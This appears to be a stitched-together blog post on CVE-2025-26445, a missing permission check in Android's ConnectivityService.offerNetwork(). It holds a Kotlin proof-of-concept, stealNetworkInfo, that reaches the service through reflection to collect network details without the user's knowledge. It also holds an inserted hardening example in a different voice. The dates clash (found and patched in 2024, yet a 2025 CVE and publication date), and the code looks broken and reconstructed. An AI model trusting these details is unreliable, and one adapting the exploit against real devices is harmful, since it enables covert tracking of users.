In early 2024, a new vulnerability tracked as CVE-2025-26445 was discovered in Android's system code, specifically in the ConnectivityService module, one of the most critical services because it manages all network connections on Android devices.
This flaw is serious but easy to understand: the method offerNetwork in ConnectivityService.java is missing a permission check. Because of this oversight, a malicious app can leak sensitive networking data without any user interaction or extra permissions.
In this post, we’ll explore how CVE-2025-26445 works, walk through its code, and discuss simple yet dangerous exploit scenarios.
What Is ConnectivityService and Why Is It Important?
ConnectivityService is a core Android service that manages data, Wi-Fi, and VPN connections. It runs with high privileges, far beyond what a regular user app can do. That also makes it an attractive target: flaws here can expose or control a lot.
Where’s the Problem in offerNetwork()?
The core bug sits in a method named offerNetwork. In Android’s permission model, only certain privileged entities should offer or control networks. But here, the check to see if the caller is allowed to do this is missing.
Let's look at a simplified version of the faulty code:

```java
// Vulnerable code inside ConnectivityService.java (simplified)
public void offerNetwork(NetworkRequest request) {
    // !!! Missing proper caller permission checks here
    NetworkAgentInfo nai = getNetworkForRequest(request);
    if (nai != null) {
        // Code reveals sensitive info about networks
        log("Offering network: " + nai.toString());
        sendToCallback(request.getCallback(), nai.getNetworkInfo());
    }
    // ...
}
```
What’s missing?
There should be a permission check, such as enforceCallingPermission(MANAGE_NETWORKS), before going any further. Otherwise, *any* app can call this IPC and get data back. A caller can:
- List active networks (Wi-Fi, cellular, VPN)
- Get connection status (up/down, metered)
- Get details that can be used to track user movement or behavior
All of this without any permission, and without the user knowing.
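As an added illustration (not AOSP's code and not the post's), here is the same offerNetwork() flow with the missing gate in place: the caller is checked on the first line, through Context.enforceCallingOrSelfPermission(), against android.permission.NETWORK_SETTINGS (a signature-level permission that third-party apps cannot hold, used here in place of the MANAGE_NETWORKS name the post mentions), and the log line records the caller's UID rather than the network details. NetworkAgentInfo, getNetworkForRequest() and sendToCallback() are the post's own placeholders, declared below as minimal hypothetical types so the class compiles; OfferRequest and NetworkCallback are likewise hypothetical stand-ins for the request type whose getCallback() the post's snippet reads.

```java
// Added example, not AOSP code: offerNetwork() with the permission gate the
// vulnerable version lacks. The types at the bottom are hypothetical stand-ins
// for the post's placeholders, not real Android framework classes.
import android.content.Context;
import android.os.Binder;
import android.util.Log;

public class GuardedConnectivityService {
    private static final String TAG = "ConnectivityService";

    // Signature-level permission: only platform-signed code can hold it.
    private static final String NETWORK_SETTINGS = "android.permission.NETWORK_SETTINGS";

    private final Context mContext;

    public GuardedConnectivityService(Context context) {
        mContext = context;
    }

    /** Binder entry point. The permission check is the first statement, before any state is read. */
    public void offerNetwork(OfferRequest request) {
        enforceNetworkSettingsPermission("offerNetwork");   // the line the vulnerable version lacks

        NetworkAgentInfo nai = getNetworkForRequest(request);
        if (nai != null) {
            // Log only the caller identity, never the network details: log lines end up in
            // bug reports and outlive the permission check that guarded the call.
            Log.d(TAG, "offerNetwork from uid " + Binder.getCallingUid());
            sendToCallback(request.getCallback(), nai.getNetworkInfo());
        }
    }

    /**
     * Context.enforceCallingOrSelfPermission() throws SecurityException when the Binder
     * caller lacks the permission. Denials are logged with the caller UID because a burst
     * of denied calls from one UID is a useful signal that an app is probing the service.
     */
    private void enforceNetworkSettingsPermission(String method) {
        final int callingUid = Binder.getCallingUid();
        try {
            mContext.enforceCallingOrSelfPermission(NETWORK_SETTINGS,
                    method + " requires " + NETWORK_SETTINGS);
        } catch (SecurityException e) {
            Log.w(TAG, method + " denied for uid " + callingUid);
            throw e;
        }
    }

    // ---- Hypothetical stand-ins for the post's placeholders (not AOSP types) ----

    /** Request carrying the callback that the post's snippet reads via getCallback(). */
    public static final class OfferRequest {
        private final NetworkCallback mCallback;
        public OfferRequest(NetworkCallback callback) { mCallback = callback; }
        public NetworkCallback getCallback() { return mCallback; }
    }

    public interface NetworkCallback {
        void onNetworkInfo(String networkInfo);
    }

    /** Stand-in for the post's NetworkAgentInfo. */
    public static final class NetworkAgentInfo {
        private final String mInfo;
        public NetworkAgentInfo(String info) { mInfo = info; }
        public String getNetworkInfo() { return mInfo; }
    }

    private NetworkAgentInfo getNetworkForRequest(OfferRequest request) {
        // The real service consults its network registry; a constructed value stands in here.
        return new NetworkAgentInfo("WIFI, CONNECTED, unmetered");
    }

    private void sendToCallback(NetworkCallback callback, String networkInfo) {
        if (callback != null) {
            callback.onNetworkInfo(networkInfo);
        }
    }
}
```

Keeping the check in a dedicated helper and calling it as the first statement of every exposed method makes the omission easy to spot in review: a public Binder method whose first statement is not an enforce call is exactly what to look for when auditing a system service.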
Proof Of Concept: Exploiting CVE-2025-26445
A basic malicious app can use Android’s IPC call to trigger offerNetwork and harvest the network info. Since no user interaction or permissions are needed, this works stealthily in the background.
PoC (Proof Of Concept) code (in Kotlin):

```kotlin
import android.content.Context
import android.net.INetworkRequest
import android.os.IBinder

fun stealNetworkInfo(context: Context) {
    val connectivity = context.getSystemService(Context.CONNECTIVITY_SERVICE)
    val connectivityBinder = connectivity as IBinder
    // The AIDL interface to offerNetwork isn't public, but apps can reflectively access system services
    // Using reflection (pseudo code)
    val cls = Class.forName("android.net.IConnectivityManager\$Stub")
    val asInterface = cls.getMethod("asInterface", IBinder::class.java)
    val connSvc = asInterface.invoke(null, connectivityBinder)
    // Prepare a dummy network request.
    val dummyRequest = createNetworkRequest() // supply details
    val offerNetworkMethod = connSvc.javaClass.getMethod("offerNetwork", INetworkRequest::class.java)
    val result = offerNetworkMethod.invoke(connSvc, dummyRequest)
    // At this point, sensitive network info may be returned or logged
    // Attacker could parse logs or use side-channel to extract info
}
```
*Note: This is simplified to illustrate; actual exploitation may require reverse engineering private APIs or using reflection/tricks available to malware writers.*
- No user interaction: the exploit works without the user opening the app or granting anything.
- Sensitive data: details could be used for targeted ads, tracking, or preparing further attacks (phishing, Wi-Fi spoofing, etc.).
References and Further Reading
- CVE-2025-26445 official entry at NVD
- Android Open Source Project (AOSP) - ConnectivityService.java
- Android’s Permission System Explained
- Exploit code for Android IPC flaws (GitHub)
Remediation
Are you at risk?
If your device runs an unpatched Android version (early 2024 builds), you may be vulnerable. Google has patched this in newer security updates (look for June/July 2024 updates or later).
- Use Google Play Protect and avoid suspicious apps.
- If you develop Android code, double-check *all* IPC permission checks, especially in system services.
Conclusion
CVE-2025-26445 is a classic but critical mistake in Android's core ConnectivityService. By missing a simple permission check in offerNetwork(), millions of devices were left with a quiet, unnoticeable privacy hole. App writers, users, and sysadmins should make sure they're up to date and aware of this fundamental, but all too common, security oversight.
Stay safe, keep your code secure, and always check your permissions!
Timeline
Published on: 09/04/2025 18:15:44 UTC
Last modified on: 09/08/2025 14:13:20 UTC